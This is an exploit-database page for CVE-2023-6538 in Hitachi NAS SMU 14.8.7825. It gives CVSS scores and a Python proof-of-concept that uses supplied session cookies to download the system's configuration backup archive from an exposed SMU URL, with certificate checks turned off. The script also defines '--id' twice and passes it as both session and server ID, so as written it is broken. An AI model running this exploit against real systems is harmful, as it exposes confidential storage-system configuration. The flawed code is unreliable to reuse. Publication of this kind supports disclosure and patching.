Lucene search
Arslan MasoodEDB-ID:51915HistoryMar 20, 2024 - 12:00 a.m.
HNAS SMU 14.8.7825 - Information Disclosure
2024-03-2000:00:00
Arslan Masood
www.exploit-db.com
122
hitachi nas
information disclosure
cve-2023-6538
vulnerability
poc
request
download
cookies
headers
security
7.6 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
7.2 High
AI Score
Confidence
Low
0.004 Low
EPSS
Percentile
73.4%
# Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure
# CVE: CVE-2023-6538
# Date: 2023-12-13
# Exploit Author: Arslan Masood (@arszilla)
# Vendor: https://www.hitachivantara.com/
# Version: < 14.8.7825.01
# Tested On: 13.9.7021.04
import argparse
from os import getcwd
import requests
parser = argparse.ArgumentParser(
description="CVE-2023-6538 PoC",
usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
)
# Create --host argument:
parser.add_argument(
"--host",
required=True,
type=str,
help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
)
# Create --id argument:
parser.add_argument(
"--id",
required=True,
type=str,
help="JSESSIONID cookie value"
)
# Create --sso argument:
parser.add_argument(
"--sso",
required=True,
type=str,
help="JSESSIONIDSSO cookie value"
)
# Create --id argument:
parser.add_argument(
"--id",
required=True,
type=str,
help="Server ID value"
)
args = parser.parse_args()
def download_file(hostname, jsessionid, jsessionidsso, serverid):
# Set the filename:
filename = "registry_data.tgz"
# Vulnerable SMU URL:
smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"
# GET request cookies
smu_cookies = {
"JSESSIONID": jsessionid,
"JSESSIONIDSSO": jsessionidsso
}
# GET request headers:
smu_headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Dnt": "1",
"Referer": f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-User": "?1",
"Te": "trailers",
"Connection": "close"
}
# Send the request:
with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
with open(filename, 'wb') as backup_archive:
# Write the zip file to the CWD:
backup_archive.write(file_download.content)
print(f"{filename} has been downloaded to {getcwd()}")
if __name__ == "__main__":
download_file(args.host, args.id, args.sso, args.id)Related
cve
cve
CVE-2023-6538
2023-12-11 18:15:30
prion
prion
Information disclosure
2023-12-11 18:15:00
cvelist
cvelist
nvd
nvd
CVE-2023-6538
2023-12-11 18:15:30
githubexploit
githubexploit
packetstorm
packetstorm
Hitachi NAS SMU 14.8.7825 Information Disclosure
2024-03-20 00:00:00
zdt
zdt
Hitachi NAS SMU 14.8.7825 Information Disclosure Vulnerability
2024-03-20 00:00:00
7.6 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
7.2 High
AI Score
Confidence
Low
0.004 Low
EPSS
Percentile
73.4%
Related for EDB-ID:51915